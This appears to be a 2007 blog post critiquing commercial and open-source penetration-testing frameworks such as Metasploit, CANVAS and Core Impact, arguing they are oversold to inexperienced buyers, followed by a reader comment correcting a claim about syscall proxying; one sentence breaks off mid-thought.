Metasploit, SAINT-exploit, Core-Impact and CANVAS are names that you’ve probably heard them while following any conversation covering penetration testing and frameworks which has been developed to speed and enhance them. The term framework we use here means set of tools, codes and scripts integrated together to help the user accomplish all or at least most of tasks s/he should focus on in a pen-test session, including but not limited to information gathering (AKA foot-printing), identifying targets, analyzing them for potentially vulnerabilities, developing exploits for them, gaining access to target and following post-exploitation tasks which can be another loop of mentioned steps.
In a normal pen-test, each step has its own definition, tools and plans to check and try. Agent should have deep level of knowledge and experience to be able to manage and finish every step and summaries results of each one to feed next step. After any step agent is usually faced with tons of results which should be cleaned up and identifying false-positives and missed items. In a legacy pen-test session, it’s agent who’ll take care of everything and match pieces of puzzle together. But in an automated session story is a bit different. Assuming the way market describe these frameworks (As automated ethical hackers) is true, an automated tool they sell should be able to automatically finish every step, summaries results and move to next step, identify flaws and finally successfully exploit them and leave the user access to compromised system for post-exploitation tasks. Of course these tools are not expected to be used by a raw brain, know nothing about what he’s doing.
But how much end-user should be experienced? reading some advertise make us think like this: Customer purchase a copy of software, one of technical guys in company will launch framework against managed IP ranges while following tools documentations and by the end of working day, company can assume they are aware of any potential vulnerability which may be abused by hackers, while checking how effective their IPS is. Such descriptions and advertises IMO, gives the false sense of security and power (of knowledge) to end-user, leaving some doors open for experienced attackers. The true is that such advertisements really sell! It’s not that hard to make your boss pay for such a wizard which is capable of owning your enterprise in matter of clicks. Why pay 100k $ each year for a red-team when we can bring one into office for a price usually less than 20k $ ?
Here is exactly where we should take a look under the hood. Let’s see what these tools really offer and who should be a real end-user of such products. Skipping some post-exploitation features, most of public frameworks out there are actually the same ideas but with different implementations. As I mentioned at beginning of this note, there are some basic steps which every framework/agent should follow in pen-test session. Let’s see how our so-called automated tools handle each step and how it really should be.
Knowing foot-printing as first step , non of available tools in market have something cool to offer , but some simple routines for automated discovery of alive hosts , open ports and detection of remote operating system (and version) . So basically we should feed the tool with range of IP addresses. It seems works right? Yes and no. ‘yes’ for the condition tool is used in local unprotected network which every host can be fingerprinted by various methods including ARP pings , sniffing broadcasts , enumerating RPC interfaces an so on. ‘No’ which is better answer is where we’re faced with some serious job and the time we’re out boarders of target network.
A basic foot-printing these tools are capable of doing, no more works these days. Most of their features come handy when you’re already inside. Beside this, most of them does not offer more-in-depth fingerprinting options like digging DNS servers, brute forcing hostnames, etc. Blindly pinging IP ranges and checking for open ports is no more an interesting idea of discovering hosts behind firewalls. Result of finger-printing can be assumed well enough when we’ve already tried public search engines , registered domains , digging any possibly linked DNS server , tracing any available email headers , brute forcing hostnames and sub domains . Finishing these tasks requires hours of search and try & error for agent, or nice pieces of fingerprinting tools and scripts mixed with AI. Both (human resource and fingerprinting scripts) are available these days, but we can not find any good sign of them in available frameworks out there. So finally we should actively help our framework to finish first step by finishing it manually or using 3rd party tools out there to make food for our IP hungry framework. We finish first step with compiling list of IP addresses we should work on in next step.
Next step is analyzing gathered IP addresses to find out details of running softwares, services and their versions. Results of this step are usually considered our only source of information for next step, exploiting flaws which require specific details about targets. Let’s see how current frameworks handle this step and how it should be. Process begins with probing hosts for open ports, continues with identifying the software listening behind any of them and finishes with trying to identify exact version of each software. Unless we’ve not finished above correctly, we have no idea if remote target is vulnerable to any known/unknown flaw. Of course there’s always chance of assume running version a common one, and try to blindly exploit it in next step. Available products are well enough to finish this step but they are not perfect like other choices we have out of package. For example they don’t have a massive database for fingerprinting and matching services like Nmap , how ever they all support its outputs .The only one looks good in this step is Core-Impact. Also they usually fail if target software is not listening on default port, except some protocols like HTTP, RPC and few others.
Real game begins here at third step; trying to exploit discovered flaws, or even cooler developing exploits based on previous findings and using them to jump in. Here’s where we really need frameworks and where they should show their real power and capabilities. In a normal pen-test, after finishing previous steps agent have enough information to focus on specific software/service as target and try to find the best possible way of exploiting vulnerabilities. ‘Best’ here means the most stable way of exploiting flaw in a manner that exploitation makes least impact on target, while flying under the radar of monitoring, detection and protection mechanism. Assuming there’s no framework out there, agent will build the exploit from scratch based on every single findings he had in previous steps. For example, he will tune addresses to exactly match remote versions, choose best possible payload based on situation (it may be a simple port-bind or an ACL flashing payload). About flying under the radar, agent must try best possible/available techniques to stay stealth. Most stealth technique is not always the best choice. So there’s much to do for preparing exploit. For a sensitive and special case (or target) we really need to carefully fine-tune the exploit, as there may be no second chance at all. But in many cases (usual tests) agent is usually faced with straight-forward and already-tried vulnerabilities. All he need to do is customize available resource (exploit) to match new target, version and situation and it means repeating of exploit development stages ,which can be really time consuming.
Let’s see how available frameworks can help and speed up this process. Unless we know technical details of targeted vulnerability (details like how to deliver payload to target service , size of buffer , heap states , bad chars , preferred code execution technique , etc.) all we have to do is write few lines in language of framework , to tell it how and where to send a payload and teach framework some details about flaw . If you’ve been careful enough in providing correct details to framework, available frameworks are stable enough to give back working results, while hiding many details of exploitation from user including generation of payload while taking care of bad chars, encoding and sending it to wire. Most of them are recently armed with advanced techniques to generate and send payloads undetectable by current market of monitoring and intrusion detection mechanism. SMB & RPC fragmentations or encrypted sessions and encoded payloads used in client-side attacks are some good samples available in MSF, CANVAS and Core-Impact.
Although frameworks looks cool and complete at this step, but again they are not final and ready to use solution for discovered vulnerabilities. In cases that targeted vulnerability has been already added to framework, user usually faces incorrect or unmatched versions of target software. skipping some specific windows related vulnerabilities which can be exploited universally, in most of cases user should have correct details for exploiting the flaw, and if end-user isn’t experienced enough to find correct details for his own version of targeted system, he will be limited to framework’s hardcode details .to be more clear, exploits provided in frameworks are useless if end-user do not have the knowledge to correctly modify them! This level of knowledge means an agent, capable of coding (not always) simple exploits for common overflow cases including but not limited to heap or stack overruns.
In case user works on exploiting some flaw which has been found during analyzes or using a flaw previously not provided in framework, he has no choice but developing his own module for framework. Current frameworks have enough interesting options to offer for this step.
In order to develop modules for framework user fist must get familiar with it. One option is reading codes of provided exploits and modules and framework core components, which is the hard way but more effective way of learning it. Next option would be checking framework documentations (if there is anything to read!). If you’re going to select CANVAS as your choice be warned that you have nothing to follow but code comments. In case you choose MSF you’ll have nice documented API and many public resources available on how to develop modules for MSF. If you choose Core-impact, few development guides compiled as CHM will be available in package. There you have few fully commented sample exploits and few other hints for BASIC developments. I’ve not checked latest versions of Impact-Dev-Guide but you can not find anything about advanced features of framework. The only resources are again provided python exploit modules. For example none of CANVAS or Core-Impact provides documentations about their payload encoders or NOP generators nor their evasion details (in a documented manner).
Skipping documentations , AFAIK Metasploit is the only framework provide some scripts and tools for primary stages of development , like determining bad-chars , determining buffer size , locating proper jump points in binaries and etc. In others you have to extract required details from your debugger or custom scripts and fill the blanks in framework.
Once again it becomes clear that end-user of framework MUST be experienced enough if he wants to get full benefits of the product. I doubt if any company out there purchase or download one of these frameworks have such a cool guy inside their office! Of course while talking about ‘customers’ I skip those companies purchase/get frameworks to speed-up their consultancy services such as penetration-testing or research.
If agent has successfully passed mentioned steps, it’s finally time to own targets. But hey, some times it’s not as simple as getting a remote shell from compromised system. Agent should get deeper into network, detect and compromise more hosts from entry point, grab some data or fool administrators to reach final penetration-test target.
In order to finish this step successfully, agent should have a previously prepared set of tools (can be home-grown or available tools released by community) ready for game. Some people prefer mix of few generic tools and their coding/scripting experience while some others prefer a complete collection of tools, already customized and tuned for every single task.
Assuming agent should jump from one host to another, portability of tools some times make trouble and annoying. Not all of tools are platform-independent & Compromised host has not always all of your tool-set dependencies. Beside that, agent should stay stealth while working. Moving every single tool to remote network is not good idea. Admins can always be there, monitoring. Transferring targeted data is not always as simple as copying them to agent’s host or an internet readable directory. Some times it’s required to bypass multiple strict firewall rules and policies to extract data from protected back-end servers. And finally there are always some prying eyes watching every single packet on network! These are some post-exploitation challenges an agent may face with in his penetration test.
Let’s see what framework have to offer. During recent years many techniques have been researched by community and some of them were cutting-edge techniques showing new aspects of post-exploitation steps. Syscall-proxying is the most notable research, introduced by Oliver Friedrichs and Tim Newsham back in 2001 as a model and first implementation was brought to community by
As you see, for this last step working is simple as some point and clicks. End-user can enjoy his browsing of compromised hosts without being worry about blocks of data moving between hosts.
Reporting is last step. No doubt that tools are always faster than us in report generation but report of a penetration test is not like reporting open ports and missed patches in scanned network. No matter how detailed and user-friendly generated reports are, they can not be used as final output. At best cases you can grab parts of generated reports (if any available) and use them in final reports. Current state of frameworks in report generation is not interesting at all. They come handy only when you want to mention exact times, dates or some detailed debugging information. Core-impact generates graphical reports and parts of generated report are really useful, but others just began caring about reports! MSF only support its detailed debugging reports and CANVAS recently added few options to framework, generating pretty raw and simple outputs. Of course canvas.log is always out there for your reference, filled with time stamped log of actions you’ve done in framework.
Summarizing above paragraphs clearly shows that current penetration-testing frameworks/products are not what they are announced in market. I don’t mean they are not useful nor poor, but they are simply not the packages as you may read about them in vendor sites, advertisements or hearing from community. In other hand, it’s now clear that what developers of these frameworks consider as ‘customers’ are not ones most of people think. Developers expect their product to be used by experienced end-users capable of using provided framework as base of their tool-set NOT their final ultimate hack-pack. At the same time, large amount of people get interested in such products think that once they purchase one of these, they get the power and knowledge of framework’s developer and nothing is left for them to do. They happily think they will get it, launch so called QA and brand new exploits against their targets and they will be in. finally after multiple tries they may even think that they have been tricked!!! The truth is that such group of customers should NOT be end-user. Before wasting your budget you should qualify yourself and check if such product can really help you or your company. If you expect the product to do the magic for you then you’re probably choosing wrong product, but if you think framework can boost your already sorted tool-set, and you can modify & enhance its features YOURSELF then I think it is right decision to pay for it. All of available frameworks have supports and experienced teams behind their products but the true is that you can not expect much from them. As I’ve experienced multiple times they are all cool and great while replying your request but you shouldn’t expect them to do all sort of things for you. Finally I think it’s better to relay on features of a framework, rather than exploits of framework. Yes, their exploits always save time you may work on your own exploit, but it’s not a single exploit-code making frameworks powerful. Frameworks are considered valuable because they provide great base and platform for your exploits and exploitation process.
*Btw, comments are always welcome here :)
Drop me a line of comment if you like to read about specific topics here.
[Updated 08 February 2007]
Thanks Dave for your review :>
"CANVAS do this in it’s unique MOSDEF way which let you remotely compile your custom codes into memory but Core-Impact and MSF let you load binaries (DLL binaries) remotely. In current market, Core-Impact and CANVAS are the only products support post-exploitation based on syscall proxying."
ReplyDeleteExcept, of course, CANVAS doesn't do syscall proxying at all, since, as you say, it uses MOSDEF.